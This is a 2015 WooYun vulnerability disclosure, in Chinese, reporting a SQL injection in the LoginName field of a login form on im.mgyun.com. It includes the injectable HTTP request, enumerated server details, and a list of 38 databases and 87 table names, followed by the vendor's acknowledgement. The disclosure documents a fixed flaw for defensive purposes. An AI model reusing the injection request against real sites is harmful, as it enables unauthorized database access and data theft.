当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103479

漏洞标题:刷机大师某站点MSSQL注射(支持union)

相关厂商:mgyun.com

漏洞作者: lijiejie

提交时间:2015-03-26 18:13

修复时间:2015-05-10 19:20

公开时间:2015-05-10 19:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-04-05: 细节向核心白帽子及相关领域专家公开
2015-04-15: 细节向普通白帽子公开
2015-04-25: 细节向实习白帽子公开
2015-05-10: 细节向公众公开

简要描述:

刷机大师某站点MSSQL注射(支持union),大量数据库

详细说明:

注入点:

POST / HTTP/1.1
Content-Length: 110
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://im.mgyun.com/
Cookie: ASP.NET_SessionId=
Host: im.mgyun.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
LoginName=test*&Password=test&VerifyCode=


参数LoginName可注入。支持union,可报错。

漏洞证明:

mssqli_mgyun.jpg


current user: 'installmasteruser'
current db : 'InstallMaster'
Server Name : 'XINYI-104'
数据库:

available databases [38]:
[*] AnalyzeSystem
[*] ApkGrabDB
[*] AppCoolPoints
[*] BaiduromLottery
[*] CPAPPLog
[*] DataCollectDB
[*] DataService_Devices
[*] DataService_Models2
[*] DataService_PCD
[*] distribution
[*] friendlinks
[*] InstallMasterLog
[*] IntegralMall
[*] KeywordLog
[*] LuckyDraw2013
[*] Mailman
[*] master
[*] MgyunAPI
[*] model
[*] msdb
[*] OpenPlatform
[*] OSMF
[*] ProductDownLog
[*] ProductManager
[*] productmanagerstatistics
[*] PushAppStatistics
[*] ReportServer
[*] ReportServerTempDB
[*] RomActiveLog
[*] RomChecker
[*] RomDownLog
[*] RomJDv3_1
[*] RomResource_Shadow
[*] tempdb
[*] UCenter
[*] UserPointsLog
[*] XGPushManagerDB
[*] XYAdmin


Database: InstallMaster
[87 tables]
+-----------------------+
| AppClass |
| AppClass |
| AppConfig |
| AppList |
| AppSummary |
| AppToInstallSchemeRel |
| AppVersion |
| CPStatus_Summary |
| CPStatus_Week |
| CP_Account |
| CP_AccountV1 |
| CP_Activated |
| CP_AdminAPP |
| CP_AdminArea |
| CP_AdminStore |
| CP_Article |
| CP_Config |
| CP_DayAppInfo |
| CP_DayAppInfoV1 |
| CP_DayLayerMoney |
| CP_DayLayerMoneyV1 |
| CP_DayPeploeMoney |
| CP_DayPeploeMoneyV1 |
| CP_DecrementConfig |
| CP_Dynamic |
| CP_Flow |
| CP_Install |
| CP_P_Manager |
| CP_P_ManagerV1 |
| CP_P_UserToManager |
| CP_P_UserToManagerV1 |
| CP_ShareRatio |
| CP_WithDrawInfo |
| CP_WithDrawInfoState |
| ClientLog |
| ClientLog |
| ClientMenuCatagory |
| ClientMenuCatagory |
| Config |
| DailyUserList |
| DateTime |
| Devices |
| EmailActivate |
| FakeUserPoint |
| HistoryStore |
| IEMIAPackageName |
| IMEIDetail |
| IMEIToUser |
| ImmediateUserList |
| InstallIMEIList |
| InstallScheme |
| InstallTime |
| LayerRelation |
| MSummary |
| Message |
| MobileList |
| MyDateTime |
| OnLineClient |
| OnLineClient |
| OnLineStore |
| OperationLog |
| OrgLayer |
| Organization |
| PhoneMarketSupplier |
| PhoneMarketTransLog |
| PhoneMarketUser |
| PointEventLimit |
| PointEventLimit |
| PointSource |
| PointSum_Daily |
| PointSum_Event |
| PointSum_Monthly |
| PointSum_Weekly |
| PointSum_Yearly |
| PointsLog |
| ResetPwdRequest |
| Role |
| SendSMSLog |
| ShareRatio |
| TempMSummary |
| UserDetail |
| UserDetail |
| UserList |
| UserPointsInt |
| UserPointsInt |
| WebConfig |
| sysdiagrams |
+-----------------------+

修复方案:

参数过滤和转义

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-03-26 19:18

厂商回复:

多谢白帽子及乌云平台的提醒和帮助。该漏洞属于低级错误,不可原谅。今后我们将加强代码的安全检测。
该站点属于我司已关停的业务,现已经停止访问。该数据库连接账户无其它数据库访问权限。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-11 01:44 | 蛋清 ( 路人 | Rank:0 漏洞数:2 )

    低级错误才给5rank?